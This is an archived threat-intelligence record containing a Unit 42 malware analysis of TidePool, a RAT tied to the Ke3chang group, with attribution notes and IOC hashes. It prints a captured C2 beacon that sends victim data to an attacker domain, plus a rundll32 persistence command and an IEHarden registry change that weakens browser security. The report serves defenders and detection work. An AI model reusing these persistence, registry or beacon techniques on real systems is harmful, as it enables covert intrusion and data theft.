{ "id": "d2474f90-ba4a-4102-b152-844f56abf46d", "created_at": "2026-04-06T00:12:08.8238Z", "updated_at": "2026-04-10T13:12:37.347929Z", "deleted_at": null, "sha1_hash": "1e35d9d3a1792cd2574378631fe779ac7f15b7eb", "title": "Operation Ke3chang Resurfaces With New TidePool Malware", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 493262, "plain_text": "Operation Ke3chang Resurfaces With New TidePool Malware\r\nBy Micah Yates, Mike Scott, Brandon Levene, Jen Miller-Osborn, Tom Keigher\r\nPublished: 2016-05-22 · Archived: 2026-04-05 16:19:27 UTC\r\nIntroduction\r\nLittle has been published on the threat actors responsible for Operation Ke3chang since the report was released more than\r\ntwo years ago. However, Unit 42 has recently discovered the actors have continued to evolve their custom malware arsenal.\r\nWe’ve discovered a new malware family we’ve named TidePool. It has strong behavioral ties to Ke3chang and is being used\r\nin an ongoing attack campaign against Indian embassy personnel worldwide. This targeting is also consistent with previous\r\nattacker TTPs; Ke3chang historically targeted the Ministry of Affairs, and also conducted several prior campaigns against\r\nIndia.\r\nThough we don’t have comprehensive targeting information, the spear phishing emails we found targeted several Indian\r\nembassies in different countries. One decoy references an annual report filed by over 30 Indian embassies across the globe.\r\nThe sender addresses of the phishing emails spoof real people with ties to Indian embassies, adding legitimacy to the emails\r\nto prompt the recipients to open the attached file. Also noteworthy, the actors are exploiting a relatively new vulnerability in\r\ntheir attacks with TidePool, which is detailed below.\r\nIn this report we will highlight the reuse of the code responsible for a variety of registry changes and command and control\r\ntraffic over time as the Ke3chang actor has evolved their codebase to TidePool since the 2013 report.\r\nExploitation of CVE-2015-2545\r\nThe weaponized document sent in phishing emails triggers the vulnerability outlined in CVE-2015-2545, which was first\r\nmade public in September 2015.  Unlike previously seen exploit carrier docs, this version comes packaged as an MHTML\r\ndocument which by default opens in Microsoft Word.  We have seen multiple waves of activity with similar exploit docs,\r\nincluding those referenced in our recent Spivy blog. PwC recently released a great report analyzing the exploit documents\r\nthemselves. The samples we are covering are documented in the \"Windows User_A\" section of their report (the malware\r\nthey refer to as \"Danti Downloader\").\r\nThe TidePool Malware Family\r\nTidePool contains many capabilities common to most RATs. It allows the attacker to read, write and delete files and folders,\r\nand run commands over named pipes. TidePool gathers information about the victim's computer, base64 encodes the data,\r\nand sends it to the Command and Control (C2) server via HTTP, which matches capabilities of the BS2005 malware family\r\nused by the Ke3chang actor\r\nThe TidePool malware is housed in an MHTML document which exploits CVE-2015-2545. The exploit code drops a DLL\r\ninto\r\nC:\\Documents and Settings\\AllUsers\\IEHelper\\mshtml.dll\r\nThis dropped DLL is the TidePool sample. It also launches Internet Explorer as a subprocess of the svchost service. For\r\npersistence, TidePool utilizes an ActiveSetup key, which will launch itself on boot with the following parameters:\r\nrundll32.exe  C:\\DOCUME~1\\ALLUSE~1\\IEHelper\\mshtml.dll,,IEHelper\r\nThe TidePool sample then sends victim computer information to the C2 server, as shown in Figure 1. Once a connection is\r\nmade, the sample behaves as a RAT, receiving commands from the C2.\r\nPOST http://goback.strangled.net:443/QCLDDMGXVXESLYT HTTP/1.1\r\nAccept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerp\r\nAccept-Language: en-us\r\nContent-Type: multipart/form-data; boundary=----=_Part_4e67c6a7\r\nAccept-Encoding: gzip, deflate\r\nUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E)\r\nHost: goback.strangled.net\r\nContent-Length: 602\r\nhttp://researchcenter.paloaltonetworks.com/2016/05/operation-ke3chang-resurfaces-with-new-tidepool-malware/\r\nPage 1 of 6\n\nProxy-Connection: Keep-Alive\r\nPragma: no-cache\r\n----=_Part_4e67c6a7\r\nContent-Disposition: form-data; name=\"m1.jpg\"\r\nContent-Type: application/octet-steam\r\nWAQAAEYBAABGAQAARgEAAAAAAAAAAAAAhv0OeukKAAAVAAAAHAEAAAUAAAABAAAAKAoAAAIAAABTAGUAcgB2AGkA\r\nFigure 1. The Base64 encoded data contains information about the victim’s service pack level, the current user,\r\nand the NETBIOS name of the victim system.\r\nThe Evolution From BS2005 to TidePool\r\nDuring our initial triage of the TidePool samples in AutoFocus, we noticed Windows Registry modifications that by\r\nthemselves were not unique, but when viewed together were used by multiple malware families. One of these families is the\r\n\"BS2005\" malware family used by the Ke3chang actor. This motivated us to dig deeper, since we had not seen any public\r\nreporting on them since 2013. From this analysis, Unit 42 compared the code bases of the new malware family, and the\r\nBS2005 malware samples. Based on our analysis we believe this new malware, which we are calling TidePool, is an\r\nevolution of the BS2005 malware family used by the Ke3chang actor.\r\nUnit 42 has discovered 11 similar registry modifications that both TidePool and BS2005 employ. The registry setting that\r\nTidePool and BS2005 focuses on is:\r\nSoftware\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\IEHarden -\u003e 0\r\nWhen the IEHarden Value is set to 0 it disables the Internet Explorer Enhanced Security configuration, which is designed to\r\nprevent the execution of scripts, ActiveX Controls, file downloads, and the Microsoft virtual machine for HTML content.\r\nThis is a technique common to both BS2005 and TidePool malware.\r\nBelow is the routine within TidePool that modifies the IEHarden registry settings. The repetition, order, and uniqueness of\r\nthe code base in this function allowed us to link TidePool back to older versions of BS2005 and Operation Ke3chang.\r\nFigure 2. Routine to modify the IEHarden Value linking TidePool to BS2005.\r\nCode reuse overlap also allowed us to link the various interim malware iterations between Ke3chang and TidePool together.\r\nGoing over every single code overlap would be tiresome, so we'll highlight major functional similarities that allowed us to\r\nlink TidePool to Operation Ke3chang. A listing of similar hashes and their compile dates can be found in the IOC section at\r\nthe end of this blog. They are also divided into those that pre-date the Operation Ke3chang report and those that came after.\r\nWe compared 5 key samples that link TidePool to the original Operation Ke3chang malware. In order of comparison and\r\nusage we looked at:\r\nBS2005 Operation Ke3chang sample\r\n233bd004ad778b7fd816b80380c9c9bd2dba5b694863704ef37643255797b41f\r\n2013 post Ke3chang\r\n012fe5fa86340a90055f7ab71e1e9989db8e7bb7594cd9c8c737c3a6231bc8cc\r\n2014 post Ke3chang\r\nhttp://researchcenter.paloaltonetworks.com/2016/05/operation-ke3chang-resurfaces-with-new-tidepool-malware/\r\nPage 2 of 6\n\n04db80d8da9cd927e7ee8a44bfa3b4a5a126b15d431cbe64a508d4c2e407ec05\r\n2014 post Ke3chang\r\neca724dd63cf7e98ff09094e05e4a79e9f8f2126af3a41ff5144929f8fede4b4\r\n2015 Current TidePool\r\n2252dcd1b6afacde3f94d9557811bb769c4f0af3cb7a48ffe068d31bb7c30e18\r\nStarting with a known Operation Ke3chang BS2005 sample, we focus on the C2 obfuscation. Figure 3 shows the routine for\r\nfollowing 2 samples:\r\n233bd004ad778b7fd816b80380c9c9bd2dba5b694863704ef37643255797b41f\r\n012fe5fa86340a90055f7ab71e1e9989db8e7bb7594cd9c8c737c3a6231bc8cc\r\nFigure 3. Comparing a BS2005 and post Ke3chang sample C2 obfuscation routine\r\nNot only do BS2005 and TidePool share repeating registry behaviors, they also use a similar code routine to obfuscate the\r\nC2. Further analysis shows that they also share similar Base64 string handling. This routine goes back even further to\r\nMyWeb malware samples, also associated with Operation Ke3chang.\r\nNext we compared the codebase for setting registry keys. The code reuse displayed in Figure 4 is the sequence that sets the\r\nIEHarden registry keys and other keys used throughout TidePool and Operation Ke3chang malware.\r\n012fe5fa86340a90055f7ab71e1e9989db8e7bb7594cd9c8c737c3a6231bc8cc\r\n04db80d8da9cd927e7ee8a44bfa3b4a5a126b15d431cbe64a508d4c2e407ec05\r\nFigure 4. Sequence that sets the IEHarden registry keys and other keys used in TidePool and Operation Ke3chang\r\nsamples.\r\nThe code that handles URL beacon creation is shown in Figure 5. These functions also displayed quite a bit of code reuse.\r\neca724dd63cf7e98ff09094e05e4a79e9f8f2126af3a41ff5144929f8fede4b4\r\n012fe5fa86340a90055f7ab71e1e9989db8e7bb7594cd9c8c737c3a6231bc8cc\r\nFigure 5. Comparing code blocks responsible for URL creation\r\nFinally, we compared the following two samples.\r\n04db80d8da9cd927e7ee8a44bfa3b4a5a126b15d431cbe64a508d4c2e407ec05\r\n2252dcd1b6afacde3f94d9557811bb769c4f0af3cb7a48ffe068d31bb7c30e18\r\nhttp://researchcenter.paloaltonetworks.com/2016/05/operation-ke3chang-resurfaces-with-new-tidepool-malware/\r\nPage 3 of 6\n\nThese samples are quite similar when looking at the library functions used, but the most notable features they have in\r\ncommon are the timeline of behaviors executed. Ke3chang and TidePool both modify the IEHarden registry key, as well as\r\nthe following list of keys. Setting these registry keys is unique to the Ke3chang and TidePool malware families.\r\nHKCU\\Software\\Microsoft\\Internet Explorer\\Main\\Check_Associations\r\nHKCU\\Software\\Microsoft\\Internet Explorer\\Main\\DisableFirstRunCustomize\r\nHKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\IEharden\r\nA Few Words On Attribution\r\nAttribution is an inexact process, however we have compiled several interesting findings which lend themselves to our\r\nconclusion that this activity and malware is related to the original Operation Ke3chang.\r\nStrong behavioral overlap between the TidePool malware family and malware called BS2005 utilized by Operation\r\nKe3chang\r\nStrong code reuse and overlap showing a branching and evolution of malware from BS2005 to TidePool.\r\nTargeting and attack method matches historic Ke3chang targeting.\r\nWhen binaries included resources, encoding was 0x04 (LANG_CHINESE) indicating the actor’s system is likely\r\nrunning an operating system and software with Chinese as the default display language.\r\nConclusion\r\nDespite going unreported on since 2013, Operation Ke3chang has not ceased operations and in fact continued developing its\r\nmalware. Unit 42 was able to track the evolution of Operation Ke3chang’s tools by observing unique behavioral quirks\r\ncommon throughout the malware’s lineage. By pivoting on these behaviors in AutoFocus, we were able to assess a\r\nrelationship between these families dating back to at least 2012 and the creation of TidePool, a new malware family\r\ncontinuing in Ke3chang’s custom malware footsteps. While we can’t know all of the groups’ attacks using TidePool or older\r\nmalware, we have uncovered its use against Indian Embassies, which was also documented in the 2013 report, indicating\r\nthis is likely a high priority target as it has continued over multiple years.\r\nCustomers can utilize the Ke3changResurfaces AutoFocus tag to examine the samples discussed in this post. IPS coverage\r\nfor TidePool is provided by TID 14588.\r\nTidePool IOCs\r\nPhishing emails:\r\n4d5e0eddcd014c63123f6a46af7e53b5ac25a7ff7de86f56277fe39bff32c7b5\r\n1896d190ed5c5d04d74f8c2bfe70434f472b43441be824e81a31b7257b717e51\r\nde5060b7e9aaaeb8d24153fe35b77c27c95dadda5a5e727d99f407c8703db649\r\nWeaponized document attachments:\r\n785e8a39eb66e872ff5abee48b7226e99bed2e12bc0f68fc430145a00fe523db\r\neea3f90db41f872da8ed542b37948656b1fb93b12a266e8de82c6c668e60e9fc\r\nTidePool Dropper:\r\n38f2c86041e0446730479cdb9c530298c0c4936722975c4e7446544fd6dcac9f\r\nTidePool dlls:\r\n67c4e8ab0f12fae7b4aeb66f7e59e286bd98d3a77e5a291e8d58b3cfbc1514ed\r\n2252dcd1b6afacde3f94d9557811bb769c4f0af3cb7a48ffe068d31bb7c30e18\r\n9d0a47bdf00f7bd332ddd4cf8d95dd11ebbb945dda3d72aac512512b48ad93ba\r\nC2 domain:\r\ngoback.strangled[.]net\r\nTidePool sample groupings\r\nGroup 1: 3/1/2012 - 3/22/2012\r\n71b548e09fd51250356111f394e5fc64ac54d5a07d9bc57852315484c2046093 (BS2005)\r\n39fdcdf019c0fca350ec5bd3de31b6649456993b3f9642f966d610e0190f9297 (BS2005)\r\nhttp://researchcenter.paloaltonetworks.com/2016/05/operation-ke3chang-resurfaces-with-new-tidepool-malware/\r\nPage 4 of 6\n\nbfa5d062bfc1739e1fcfacefd3a1f95b40104c91201efc618804b6eb9e30c018\r\n4e38848fabd0cb99a8b161f7f4972c080ce5990016212330d7bfbe08ab49526a\r\nd097a1d5f86b3a9585cca42a7785b0ff0d50cd1b61a56c811d854f5f02909a5d\r\n25a3b374894cacd922e7ff870bb19c84a9abfd69405dded13c3a6ceb5abe4d27\r\nGroup 2: 6/1/2012 - 7/10/2012\r\n12cc0fdc4f80942f0ba9039a22e701838332435883fa62d0cefd3992867a9e88(BS2005)\r\na4fae981b687fe230364508a3324cf6e6daa45ecddd6b7c7b532cdc980679076(BS2005)\r\nc1a83a9600d69c91c19207a8ee16347202d50873b6dc4613ba4d6a6059610fa1\r\nGroup 3: 8/28/2012 - 11/19/2012\r\n023e8f5922b7b0fcfe86f9196ae82a2abbc6f047c505733c4b0a732caf30e966(BS2005)\r\n064051e462990b0a530b7bbd5e46b68904a264caee9d825e54245d8c854e7a8a(BS2005)\r\n07aa6f24cec12b3780ebaba2ca756498e3110243ca82dca018b02bd099da36bb(BS2005)\r\ncdb8a15ededa8b4dee4e9b04a00b10bf4b6504b9a05a25ecae0b0aca8df01ff9(BS2005)\r\nf84a847c0086c92d7f90249be07bbf2602fe97488e2fef8d3e7285384c41b54e(BS2005)\r\n89ccea68f76afa99d4b5d00d35b6d2f229c4af914fbb2763e37f5f87dcf2f7bf\r\nbe378ad63b61b03bdc6fd3ef3b81d3c2d189602a24a960118e074d7aff26c7bd\r\nc5d274418532231a0a225fc1a659dd034f38fde051840f8ed39e0b960d84c056\r\nGroup 4: 4/18/2013 - 11/5/2013\r\n233bd004ad778b7fd816b80380c9c9bd2dba5b694863704ef37643255797b41f(BS2005)\r\n3795fd3e1fe4eb8a56d611d65797e3947acb209ddb2b65551bf067d8e1fa1945(BS2005)\r\n6d744f8a79e0e937899dbc90b933226e814fa226695a7f0953e26a5b65838c89(BS2005)\r\nb344b9362ac274ca3547810c178911881ccb44b81847071fa842ffc8edfcd6ec(BS2005)\r\ne72c5703391d4b23fcd6e1d4b8fd18fe2a6d74d05638f1c27d70659fbf2dcc58 (BS2005)\r\n690c4f474553a5da5b90fb43eab5db24f1f2086e6d6fd75105b54e616c490f3f\r\nd64cd5b4caf36d00b255fdaccb542b33b3a7d12aef9939e35fdb1c5f06c2d69c\r\n0ec913017c0adc255f451e8f38956cfc1877e1c3830e528b0eb38964e7dd00ff\r\nPost Fireye's Ke3chang blog\r\nGroup 5: 5/2/2013 - 10/23/2013\r\n012fe5fa86340a90055f7ab71e1e9989db8e7bb7594cd9c8c737c3a6231bc8cc\r\n0f88602a11963818b73a52f00a4f670a0bf5111b49549aa13682b66dd9895155\r\n2a454d9577d75ac76f5acf0082a6dca37be41f7c74e0a4dbd41d8a9a75120f5c\r\n66d9001b6107e16cdb4275672e8dd21b3263481a56f461428909a7c265c67851\r\n863ee162a18d429664443ce5c88a21fd629e22ad739191c7c6a9237f64cdd2f3\r\n8b3ef6112f833d6d232864cf66b57a0f513e0663ee118f8d33d93ad8651af330\r\n904e31e4ab030cba00b06216c81252f6ee189a2d044eca19d2c0dc41508512f3\r\nGroup 6: 03/09/2014\r\nF3c39376aa93b6d17903f1f3d6a557eb91a977dae19b4358ef57e686cd52cc03\r\n7c17ccdd8eba3791773de8bc05ab4854421bc3f2554c7ded00065c10698300fe\r\nGroup 7: 08/26/2014\r\nhttp://researchcenter.paloaltonetworks.com/2016/05/operation-ke3chang-resurfaces-with-new-tidepool-malware/\r\nPage 5 of 6\n\neca724dd63cf7e98ff09094e05e4a79e9f8f2126af3a41ff5144929f8fede4b4\r\nGroup 8: 04/09/2014 04db80d8da9cd927e7ee8a44bfa3b4a5a126b15d431cbe64a508d4c2e407ec05\r\nGroup 9: 3/11/2015\r\n6eb3528436c8005cfba21e88f498f7f9e3cf40540d774ab1819cddf352c5823d\r\nGroup 10: 08/04/2015\r\n6bcf242371315a895298dbe1cdec73805b463c13f9ce8556138fa4fa0a3ad242\r\nGroup 11: 12/28/2015\r\n2252dcd1b6afacde3f94d9557811bb769c4f0af3cb7a48ffe068d31bb7c30e18\r\n38f2c86041e0446730479cdb9c530298c0c4936722975c4e7446544fd6dcac9f\r\n67c4e8ab0f12fae7b4aeb66f7e59e286bd98d3a77e5a291e8d58b3cfbc1514ed\r\n9d0a47bdf00f7bd332ddd4cf8d95dd11ebbb945dda3d72aac512512b48ad93ba\r\nSource: http://researchcenter.paloaltonetworks.com/2016/05/operation-ke3chang-resurfaces-with-new-tidepool-malware/\r\nhttp://researchcenter.paloaltonetworks.com/2016/05/operation-ke3chang-resurfaces-with-new-tidepool-malware/\r\nPage 6 of 6", "extraction_quality": 1, "language": "EN", "sources": [ "Malpedia" ], "origins": [ "web" ], "references": [ "http://researchcenter.paloaltonetworks.com/2016/05/operation-ke3chang-resurfaces-with-new-tidepool-malware/" ], "report_names": [ "operation-ke3chang-resurfaces-with-new-tidepool-malware" ], "threat_actors": [ { "id": "2d7530f9-cd8e-4703-8aed-ab938e3b08cf", "created_at": "2023-01-06T13:46:38.620662Z", "updated_at": "2026-04-10T02:00:03.04163Z", "deleted_at": null, "main_name": "Danti", "aliases": [], "source_name": "MISPGALAXY:Danti", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "4b076dcb-516e-42fb-9c8f-f153902cd5e9", "created_at": "2022-10-25T16:07:23.708745Z", "updated_at": "2026-04-10T02:00:04.720108Z", "deleted_at": null, "main_name": "Hidden Lynx", "aliases": [ "Aurora Panda", "Group 8", "Heart Typhoon", "Hidden Lynx", "Operation SMN" ], "source_name": "ETDA:Hidden Lynx", "tools": [ "AGENT.ABQMR", "AGENT.AQUP.DROPPER", "AGENT.BMZA", "AGENT.GUNZ", "BlackCoffee", "HiKit", "MCRAT.A", "Mdmbot.E", "Moudoor", "Naid", "PNGRAT", "Trojan.Naid", "ZoxPNG", "gresim" ], "source_id": "ETDA", "reports": null }, { "id": "cf7fc640-acfe-41c4-9f3d-5515d53a3ffb", "created_at": "2023-01-06T13:46:38.228042Z", "updated_at": "2026-04-10T02:00:02.883048Z", "deleted_at": null, "main_name": "APT1", "aliases": [ "PLA Unit 61398", "Comment Crew", "Byzantine Candor", "Comment Group", "GIF89a", "Group 3", "TG-8223", "Brown Fox", "ShadyRAT", "G0006", "COMMENT PANDA" ], "source_name": "MISPGALAXY:APT1", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "0a03e7f0-2f75-4153-9c4f-c46d12d3962e", "created_at": "2022-10-25T15:50:23.453824Z", "updated_at": "2026-04-10T02:00:05.28793Z", "deleted_at": null, "main_name": "Ke3chang", "aliases": [ "Ke3chang", "APT15", "Vixen Panda", "GREF", "Playful Dragon", "RoyalAPT", "Nylon Typhoon" ], "source_name": "MITRE:Ke3chang", "tools": [ "Okrum", "Systeminfo", "netstat", "spwebmember", "Mimikatz", "Tasklist", "MirageFox", "Neoichor", "ipconfig" ], "source_id": "MITRE", "reports": null }, { "id": "761d1fb2-60e3-46f0-9f1c-c8a9715967d4", "created_at": "2023-01-06T13:46:38.269054Z", "updated_at": "2026-04-10T02:00:02.90356Z", "deleted_at": null, "main_name": "APT3", "aliases": [ "GOTHIC PANDA", "TG-0110", "Buckeye", "Group 6", "Boyusec", "BORON", "BRONZE MAYFAIR", "Red Sylvan", "Brocade Typhoon" ], "source_name": "MISPGALAXY:APT3", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "a7aefdda-98f1-4790-a32d-14cc99de2d60", "created_at": "2023-01-06T13:46:38.281844Z", "updated_at": "2026-04-10T02:00:02.909711Z", "deleted_at": null, "main_name": "APT17", "aliases": [ "BRONZE KEYSTONE", "G0025", "Group 72", "G0001", "HELIUM", "Heart Typhoon", "Group 8", "AURORA PANDA", "Hidden Lynx", "Tailgater Team" ], "source_name": "MISPGALAXY:APT17", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "593dd07d-853c-46cd-8117-e24061034bbf", "created_at": "2025-08-07T02:03:24.648074Z", "updated_at": "2026-04-10T02:00:03.625859Z", "deleted_at": null, "main_name": "BRONZE OVERBROOK", "aliases": [ "Danti ", "DragonOK ", "Samurai Panda ", "Shallow Taurus ", "Temp.DragonOK " ], "source_name": "Secureworks:BRONZE OVERBROOK", "tools": [ "Aveo", "DDKONG", "Godzilla Webshell", "HelloBridge", "IsSpace", "NFLog Trojan", "PLAINTEE", "PlugX", "Rambo" ], "source_id": "Secureworks", "reports": null }, { "id": "7d5531e2-0ad1-4237-beed-af009035576f", "created_at": "2024-05-01T02:03:07.977868Z", "updated_at": "2026-04-10T02:00:03.817883Z", "deleted_at": null, "main_name": "BRONZE PALACE", "aliases": [ "APT15 ", "BRONZE DAVENPORT ", "BRONZE IDLEWOOD ", "CTG-6119 ", "CTG-6119 ", "CTG-9246 ", "Ke3chang ", "NICKEL ", "Nylon Typhoon ", "Playful Dragon", "Vixen Panda " ], "source_name": "Secureworks:BRONZE PALACE", "tools": [ "BMW", "BS2005", "Enfal", "Mirage", "RoyalCLI", "RoyalDNS" ], "source_id": "Secureworks", "reports": null }, { "id": "7c8cf02c-623a-4793-918b-f908675a1aef", "created_at": "2023-01-06T13:46:38.309165Z", "updated_at": "2026-04-10T02:00:02.921721Z", "deleted_at": null, "main_name": "APT15", "aliases": [ "Metushy", "Lurid", "Social Network Team", "Royal APT", "BRONZE DAVENPORT", "BRONZE IDLEWOOD", "VIXEN PANDA", "Ke3Chang", "Playful Dragon", "BRONZE PALACE", "G0004", "Red Vulture", "Nylon Typhoon" ], "source_name": "MISPGALAXY:APT15", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "06f622cb-3a78-49cf-9a4c-a6007a69325f", "created_at": "2022-10-25T16:07:23.315239Z", "updated_at": "2026-04-10T02:00:04.537826Z", "deleted_at": null, "main_name": "APT 3", "aliases": [ "APT 3", "Boron", "Brocade Typhoon", "Bronze Mayfair", "Buckeye", "G0022", "Gothic Panda", "Group 6", "Operation Clandestine Fox", "Operation Clandestine Fox, Part Deux", "Operation Clandestine Wolf", "Operation Double Tap", "Red Sylvan", "TG-0110", "UPS Team" ], "source_name": "ETDA:APT 3", "tools": [ "APT3 Keylogger", "Agent.dhwf", "BKDR_HUPIGON", "Backdoor.APT.CookieCutter", "Badey", "Bemstour", "CookieCutter", "Destroy RAT", "DestroyRAT", "DoublePulsar", "EXL", "EternalBlue", "HTran", "HUC Packet Transmit Tool", "Hupigon", "Hupigon RAT", "Kaba", "Korplug", "LaZagne", "MFC Huner", "OSInfo", "Pirpi", "PlugX", "RedDelta", "RemoteCMD", "SHOTPUT", "Sogu", "TIGERPLUG", "TTCalc", "TVT", "Thoper", "Xamtrav", "remotecmd", "shareip", "w32times" ], "source_id": "ETDA", "reports": null }, { "id": "17b1b76b-16da-4c4f-8b32-f6fede3eda8c", "created_at": "2022-10-25T16:07:23.750796Z", "updated_at": "2026-04-10T02:00:04.736762Z", "deleted_at": null, "main_name": "Ke3chang", "aliases": [ "APT 15", "BackdoorDiplomacy", "Bronze Davenport", "Bronze Idlewood", "Bronze Palace", "CTG-9246", "G0004", "G0135", "GREF", "Ke3chang", "Metushy", "Nylon Typhoon", "Operation Ke3chang", "Operation MirageFox", "Playful Dragon", "Playful Taurus", "PurpleHaze", "Red Vulture", "Royal APT", "Social Network Team", "Vixen Panda" ], "source_name": "ETDA:Ke3chang", "tools": [ "Agentemis", "Anserin", "BS2005", "BleDoor", "CarbonSteal", "Cobalt Strike", "CobaltStrike", "DarthPusher", "DoubleAgent", "EternalBlue", "GoldenEagle", "Graphican", "HenBox", "HighNoon", "IRAFAU", "Ketrican", "Ketrum", "LOLBAS", "LOLBins", "Living off the Land", "MS Exchange Tool", "Mebroot", "Mimikatz", "MirageFox", "NBTscan", "Okrum", "PluginPhantom", "PortQry", "ProcDump", "PsList", "Quarian", "RbDoor", "RibDoor", "Royal DNS", "RoyalCli", "RoyalDNS", "SAMRID", "SMBTouch", "SilkBean", "Sinowal", "SpyWaller", "Theola", "TidePool", "Torpig", "Turian", "Winnti", "XSLCmd", "cobeacon", "nbtscan", "netcat", "spwebmember" ], "source_id": "ETDA", "reports": null }, { "id": "3aaf0755-5c9b-4612-9f0e-e266ef1bdb4b", "created_at": "2022-10-25T16:07:23.480196Z", "updated_at": "2026-04-10T02:00:04.626125Z", "deleted_at": null, "main_name": "Comment Crew", "aliases": [ "APT 1", "BrownFox", "Byzantine Candor", "Byzantine Hades", "Comment Crew", "Comment Panda", "G0006", "GIF89a", "Group 3", "Operation Oceansalt", "Operation Seasalt", "Operation Siesta", "Shanghai Group", "TG-8223" ], "source_name": "ETDA:Comment Crew", "tools": [ "Auriga", "Cachedump", "Chymine", "CookieBag", "Darkmoon", "GDOCUPLOAD", "GLOOXMAIL", "GREENCAT", "Gen:Trojan.Heur.PT", "GetMail", "Hackfase", "Hacksfase", "Helauto", "Kurton", "LETSGO", "LIGHTBOLT", "LIGHTDART", "LOLBAS", "LOLBins", "LONGRUN", "Living off the Land", "Lslsass", "MAPIget", "ManItsMe", "Mimikatz", "MiniASP", "Oceansalt", "Pass-The-Hash Toolkit", "Poison Ivy", "ProcDump", "Riodrv", "SPIVY", "Seasalt", "ShadyRAT", "StarsyPound", "TROJAN.COOKIES", "TROJAN.FOXY", "TabMsgSQL", "Tarsip", "Trojan.GTALK", "WebC2", "WebC2-AdSpace", "WebC2-Ausov", "WebC2-Bolid", "WebC2-Cson", "WebC2-DIV", "WebC2-GreenCat", "WebC2-Head", "WebC2-Kt3", "WebC2-Qbp", "WebC2-Rave", "WebC2-Table", "WebC2-UGX", "WebC2-Yahoo", "Wordpress Bruteforcer", "bangat", "gsecdump", "pivy", "poisonivy", "pwdump", "zxdosml" ], "source_id": "ETDA", "reports": null } ], "ts_created_at": 1775434328, "ts_updated_at": 1775826757, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/1e35d9d3a1792cd2574378631fe779ac7f15b7eb.pdf", "text": "https://archive.orkl.eu/1e35d9d3a1792cd2574378631fe779ac7f15b7eb.txt", "img": "https://archive.orkl.eu/1e35d9d3a1792cd2574378631fe779ac7f15b7eb.jpg" } }